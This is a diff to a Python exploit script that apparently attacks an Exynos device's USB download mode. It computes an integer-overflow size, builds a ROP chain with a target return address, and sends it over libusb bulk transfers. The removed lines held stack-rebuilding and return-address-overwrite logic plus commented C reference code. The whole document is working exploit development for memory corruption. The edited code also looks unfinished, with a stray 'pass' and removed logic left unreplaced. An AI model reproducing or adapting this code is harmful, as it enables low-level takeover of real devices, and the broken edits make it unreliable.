diff --git a/exploit.py b/exploit.py index 52c8579..65adbf7 100644 --- a/exploit.py +++ b/exploit.py @@ -92,8 +92,9 @@ class ExynosDevice(): current_offset = TARGET_OFFSETS[self.target][0] transferred = ctypes.c_int() - size_to_overflow = 0x100000000 - current_offset + TARGET_OFFSETS[self.target][1] + 8 + 6 + size_to_overflow = 0x100000000 - current_offset + TARGET_OFFSETS[self.target][1] + 8 + 6 max_payload_size = 0x100000000 - size_to_overflow + ram_size = ((size_to_overflow % CHUNK_SIZE) % BLOCK_SIZE) # max_payload_size = 0xffffffff - current_offset + DL_BUFFER_SIZE + TARGET_OFFSETS[self.target][1] # max_payload_size = (TARGET_OFFSETS[self.target][2] - TARGET_OFFSETS[self.target][0]) - 0x200 @@ -133,11 +134,8 @@ class ExynosDevice(): cnt += 1 print(f"{cnt} {hex(current_offset)}") - rop_chain = (b"\x00" * 0x110) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2) - # p_offset = (TARGET_OFFSETS[self.target][1] - current_offset) - # rop_chain = rop_chain[:p_offset] + (p64(TARGET_OFFSETS[self.target][0])) - # rop_chain = p64(TARGET_OFFSETS[self.target][0]) * 32 - # Should + # Build ROP chain. + rop_chain = (b"\x00" * (ram_size - 6)) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2) transferred = ctypes.c_int(0) res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0) # assert transferred.value == len(rop_chain), "Error sending ROP chain" @@ -146,70 +144,7 @@ class ExynosDevice(): res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 1000) - padding_size = TARGET_OFFSETS[self.target][1] - TARGET_OFFSETS[self.target][0] - padding_size -= len(payload) - - - # Construct payload, we can only overflow with 1 transfer. - dl_buf_current = DL_BUFFER_START - - if len(payload) > MAX_PAYLOAD_SIZE: - print("payload too big!") - return - - payload = payload + ((MAX_PAYLOAD_SIZE - len(payload)) * b"\xcc") - payload = struct.pack(" 0): - block_cnt -= 1 - padding_size = BLOCK_SIZE - - - ram_size = padding_size + 4 + 2 - - # # Reconstruct stack - ram = b"\xcc" * ram_size - ram = ram[:padding_size] + p32(TARGET_OFFSETS[self.target][0]) + ram[padding_size + 4:] - - # *(uint32_t*)&ram[padding_size] = targets[target_id][XFER_BUFFER];//overwriting return address in stack :] - payload_size = len(payload) + (CHUNK_SIZE * chunk_cnt) + (BLOCK_SIZE * block_cnt) + ram_size pass - # payload->size = original_payload_size + (CHUNK_SIZE * chunk_cnt) + (BLOCK_SIZE * block_cnt) + ram_size; - # dprint("malicious payload->size=0x%x\n", payload->size); - - # uint32_t min_size_to_overflw = (uint32_t)0 - targets[target_id][XFER_BUFFER]; - # dprint("min_size_to_overflw = 0x%x\n", min_size_to_overflw); - # if(min_size_to_overflw > payload->size) - # printf("ERROR : min_size_to_overflw > payload->size\n"); - - # // step 3 : usb communication - # printf("- exploit: sending payload...\n"); - # rc = libusb_bulk_transfer(handle, LIBUSB_ENDPOINT_OUT | 2, (uint8_t*)payload, original_payload_size, &transferred, 0); - # if(rc) { - # printf("libusb_bulk_transfer LIBUSB_ENDPOINT_OUT: error %d\n", rc); - # fprintf(stderr, "Error libusb_bulk_transfer: %s\n", libusb_error_name(rc)); - # return rc; - # } if __name__ == "__main__":